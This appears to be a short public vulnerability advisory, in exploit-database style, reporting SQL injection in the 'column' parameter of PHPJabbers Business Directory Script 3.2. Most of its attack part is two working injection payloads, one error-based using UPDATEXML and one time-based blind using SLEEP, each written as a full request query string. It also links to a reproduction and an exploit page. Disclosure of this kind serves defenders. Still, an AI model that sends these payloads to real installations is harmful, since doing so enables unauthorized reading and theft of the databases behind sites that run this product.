## Title: Business-Directory-Script-3.2 SQLi
## Author: nu11secur1ty
## Date: 08/25/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/business-directory-script/#sectionDemo
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `column` parameter appears to be vulnerable to SQL injection
attacks. The payload ' was submitted in the column parameter, and a
database error message was returned. You should review the contents of
the error message, and the application's handling of other input, to
confirm whether a vulnerability is present. Additionally, the payload
(select*from(select(sleep(20)))a) was submitted in the column
parameter. The application took 20271 milliseconds to respond to the
request, compared with 230 milliseconds for the original request,
indicating that the injected SQL command caused a time delay. The
attacker can steal all information from the database of the server of
this application!

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:
```mysql
---
Parameter: column (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: controller=pjAdminListings&action=pjActionGetListing&column=(UPDATEXML(2242,CONCAT(0x2e,0x716a767a71,(SELECT
(ELT(2242=2242,1))),0x7178787671),5199))&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: controller=pjAdminListings&action=pjActionGetListing&column=(SELECT
6261 FROM (SELECT(SLEEP(15)))CMYC)&direction=ASC&page=1&rowCount=10&listing_refid=999888&keyword=999888&owner_id=&address_state=999888&address_city=999888&country_id=2&category_id=
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Business-Directory-Script-Version%3A3.2/SQLi)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/business-directory-script-version32-sqli.html)

## Time spend:
01:35:00